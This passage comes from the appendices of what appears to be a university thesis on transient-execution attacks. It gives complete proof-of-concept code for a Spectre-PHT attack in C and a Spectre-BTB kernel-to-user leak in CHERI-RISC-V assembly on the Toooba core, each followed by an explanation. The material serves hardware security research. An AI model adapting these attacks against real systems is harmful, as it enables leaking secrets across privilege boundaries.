flush_arr[0x9] = spec_funct(0x9);
flush_arr[0xa] = spec_funct(0xa);
flush_arr[0xb] = spec_funct(0xb);
flush_arr[0xc] = spec_funct(0xc);
flush_arr[0xd] = spec_funct(0xd);
flush_arr[0xe] = spec_funct(0xe);
flush_arr[0xf] = spec_funct(0xf);
// flush cache to evict the line
// containing the `size` parameter
flush();
// store index at mem
// keep line cached
sec_arr_2[8] = & (mem[0x40]);
// ensure that all previous
// loads and stores are finished
asm volatile("fence rw, rw");
// call spec function with
// out of bounds argument
flush_arr[0x20] = spec_funct(24);
// probe the memory
probe();
}
void fill_sec_arr()
{
for(int i = 0; i < size; i++)
{
sec_arr_1[i] = &(mem[0]);
}
}
76 APPENDIX A. FULL C ATTACK
void probe()
{
long int dest;
for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8)
{
dest = mem[i];
mem[i] = dest + 1;
}
}
long int spec_funct(long int index)
{
long int dest = index;
if(index < size)
{
long int* mem_index = sec_arr_1[index];
dest = *mem_index;
}
return dest;
}
void flush()
{
long int dest;
for(int i = 0; i < FLUSH_ARR_SIZE_DW; i = i + 8)
{
dest = flush_arr[i];
flush_arr[i] = dest + 1;
}
}
In this appendix, I explain how I conducted a Spectre-PHT attack written in
C. However, I do not explain the specific Spectre-PHT vulnerability as I have
already done so in Chapters 4 and 5. I chose a similar setup to the original
Spectre-PHT demonstrated in [22]. Parts of the preparation code, e.g., initial-
ising registers, is not shown in the code above. The attack setup is as follows.
The function spec_funct accesses the array sec_arr_1 and returns the
value stored at the secret memory pointer if the parameter value index is less
APPENDIX A. FULL C ATTACK 77
than size. I chose size to be 16 in this example. There exists another array
sec_arr_2, which holds secret memory pointers as well. It is the goal of the
attacker to reveal one or more secret memory addresses from sec_arr_2 in
this attack.
The arrays sec_arr_1 and sec_arr_2 are placed adjacently in mem-
ory by the compiler. The attacker wants to use a greater index than allowed in
order to read from sec_arr_2 instead of sec_arr_1. The code in main
fulfills three functions: it prepares the attack, conducts it, and eventually re-
veals the sought memory address by probing. In the preparation phase, I fill
the array sec_arr_1 with meaningful pointer values and call the function
spec_funct with values in the range [0, . . . ,0xf] for the index parame-
ter. Next, I need to flush the memory in order to evict the cache line, which
holds the value of the size variable. The flush function evicts cache lines by
loading other cache lines currently not being present.
Flushing introduces the necessary delay for the actual Spectre-PHT attack
later. After flushing, I also setup the array sec_arr_2 for the attack by stor-
ing a meaningful value. This brings the cache lines into the cache as well,
which makes the attacker faster. The last step before the attack is introduce a
memory fence, which avoids that the processor speculates too far. This would
cause uninitialised data to be used in speculation, which would lead to cache
misses and therefore would negatively impact the entire attack. In general,
the attacker wants to use every cycle of the misspeculated control-flow as ef-
fectively as possible and therefore attackers want to avoid unnecessary cache
misses. After that, the actual attack is conducted as described in Chapters 4
and 5. Last, I use the probing mechanism described in Section 3.3.2, which
reveals the sought value.
Appendix B
Full CHERI-RISC-V Attack
.text
/*
Kernel-BTB
Author: Franz Fuchs
The goal of the attack is to speculatively jump from
S mode to U mode. This gives an attacker the full
register state of the code operating in S mode. In
this example, the user code leaks private to M mode.
This attack is similar to the sandbox attack.
1st load: 0x0000000080060000
2nd load: 0x0000000080061000
*/
change_to_cap_mode:
// set pcc flags such that capability encoding
// mode is used
// This is described in the CHERI Specification v7
cspecialr ct3, pcc
li t1, 1
csetflags ct3, ct3, t1
li t2, 0x80000018
csetoffset ct3, ct3, t2
78
APPENDIX B. FULL CHERI-RISC-V ATTACK 79
cjr ct3
init_caps:
/*
* data capabilities
*/
// cs1 is a capability to [0x80001000 - 0x80001fff]
li t2, 0x80001000
cfromptr cs1, ddc, t2
li t1, 0x1000
csetbounds cs1, cs1, t1
// ct6 is a capability to [0x80002000 - 0x80002fff]
li t2, 0x80002000
cfromptr ct6, ddc, t2
li t1, 0x1000
csetbounds ct6, ct6, t1
// store value at 0(ct6)
li t1, 0x200
csd t1, 0(ct6)
/*
* code capabilities
*/
// PCC for flush function
cllc cs4, flush
li t1, 0x100
csetbounds cs4, cs4, t1
// PCC for user code jump
cllc cs5, user_funct_cont
li t1, 0x100
csetbounds cs5, cs5, t1
80 APPENDIX B. FULL CHERI-RISC-V ATTACK
// PCC for kernel code jump
cllc ct1, kernel_funct_cont
li t2, 0x100
csetbounds ct1, ct1, t2
// store at 0(cs1)
csc ct1, 0(cs1)
init_exceps:
// enable interrupts for all privilege levels
// MIE = 1, SIE = 1, UIE = 1
li t2, 0xb
csrs mstatus, t2
// delegate ecalls to S mode
// ecalls are set with bit 8
li t2, 256
csrw medeleg, t2
// changes to S mode
change_to_s_mode:
// set MPP such that we return to S mode
li x6, 0x00001000
csrc mstatus, x6
li x6, 0x00000800
csrs mstatus, x6
// store perform_s_mode_action address in mepcc
cllc ct0, perform_s_mode_action
cspecialw mepcc, ct0
mret
// initialises trap vector
perform_s_mode_action:
// stvec mode: direct (value 0 as RISC-V instructions
// are aligned on 2 byte boundaries)
APPENDIX B. FULL CHERI-RISC-V ATTACK 81
// stvec base address: kernel_funct
cllc ct2, kernel_funct
li t1, 0x10000
csetbounds ct2, ct2, t1
cspecialw stcc, ct2
change_to_u_mode:
// set SPP such that we return to U mode
li x6, 0x00000100
csrc sstatus, x6
// store user_funct address in mepcc
cllc ct0, user_funct
li t1, 0x10000
csetbounds ct0, ct0, t1
cspecialw sepcc, ct0
// jump to user code
sret
flush:
// flush entire cache
// use ddc for that
// set to memory address not used by
// other sections
li t2, 0x80010000
li t3, 0x4000
add t3, t2, t3
cfromptr ct1, ddc, t2
flush_loop:
cld t0, 0(ct1)
cincoffsetimm ct1, ct1, 64
cgetaddr t0, ct1
ble t0, t3, flush_loop
82 APPENDIX B. FULL CHERI-RISC-V ATTACK
// fence instruction
fence rw, rw
cret
/*
* kernel code
*
* running in S priviledge mode
*/
.section .kernel , "ax"
kernel_funct:
// jump to start function
// done this way in order to always have the same
// start address, which gives makes it easier to
// alias the right BTB entry
j kernel_funct_start
.rept 0x40
.byte 0x00
.endr
kernel_funct_start:
// generate a powerful capability
li t2, 0x80060000
li t3, 0x10000
li t4, 0x1000
add t3, t2, t3
cfromptr ct6, ddc, t2
csd t4, 0(ct6)
// jump to kernel_funct_cont
clc ct1, 0(cs1)
// this jump will be aliased and MUST NOT be
// moved around. If moved around, the corresponding
// jump in the user code must be adjusted as well
cjr ct1
APPENDIX B. FULL CHERI-RISC-V ATTACK 83
.rept 0x40
.byte 0x00
.endr
kernel_funct_cont:
// content of ct6 shall not be visible to anyone else
cmove ct6, cnull
// idle here
j kernel_funct_cont
/*
* user code
*
* running in U priviledge mode
*/
.section .user , "ax"
user_funct:
// done this way in order to always have the same
// start address, which gives makes it easier to
// alias the right BTB entry
j user_funct_start
.rept 0xc52
.byte 0x00
.endr
user_funct_start:
// flush caches
cjalr cra, cs4
// jump to continued code
// this jump will be used for aliasing and MUST NOT be
// moved around. If moved around, the corresponding
// jump in the kernel code must be adjusted as well
cjr cs5
84 APPENDIX B. FULL CHERI-RISC-V ATTACK
.rept 0x40
.byte 0x00
.endr
user_funct_cont:
// load from ct6
// This is the transient-execution sequence
// revealing the secret value
cld t5, 0(ct6)
cincoffset ct5, ct6, t5
cld t5, 0(ct5)
// call kernel_funct
ecall
// infinite loop
user_funct_loop:
add t1, x0, x0
beq t1, x0, user_funct_loop
In this appendix, I explain how I conducted a Spectre-BTB attack written
in CHERI-RISC-V assembly. However, I do not explain the specific Spectre-
BTB vulnerability as I have already done so in Chapters 4 and 5. The code
is separated in preparation code, kernel code, and user code. The goal of the
attack is to leak a kernel-space secret from user space. I will only describe the
preparation code as the kernel and user space code depicted above shows large
similarities to the attack described in Section 5.1.3.
The task is to bring Toooba from integer pointer mode to capability pointer
mode, which is achieved in change_to_cap_mode by setting the corre-
sponding flag to a code capability and then jumping to it. The next step is to set
up capability registers with code and data capabilities used during the demon-
stration of the attack later. This is done in the code following the init_caps
label. The principle is always the same. First, the almighty capability stored in
ddc is moved to a register and the base address of the capability is specified.
As the second and last step, the bounds are set.
The largest part of the preparation code is to set up Toooba such that the
kernel code runs in S privilege mode and the user code runs in U privilege
mode. The kernel code will be called during exception handling, which re-
quires that I need to enable exceptions (done in init_exceps) and set up
exception vectors. A pointer to the function kernel_funct is stored in
APPENDIX B. FULL CHERI-RISC-V ATTACK 85
stcc – the capability extended register for the exception vector base address
register in S privilege mode – setting up exception handling. Finally, the code
changes privilege mode to U mode and jumps to the function user_funct
– the beginning of the user code.
The two instructions in the function user_funct_start constitute the
last part of the preparation code. The first instruction is a call to the flush
function defined earlier in the code. This ensures that a load in the kernel
code will miss all caches and therefore enable the attack due to Toooba mis-
speculating for a longer time. The second instruction is a jump to the label
user_funct_cont. This jump instruction trains the BTB as described in
Chapter 5. The ecall instruction is an environment call, which is handled
by the kernel code. This effectively starts the attack. A probing function is
not shown in the attack example above. At multiple places in the code, I use
assembler macros that insert zero bytes or no-operations (nop). This is used in
order to align instructions in memory such that the BTB aliasing approaches
works. The .section statements have the same task, but on a coarser scale.
TRITA-EECS-EX-2021:61
www.kth.se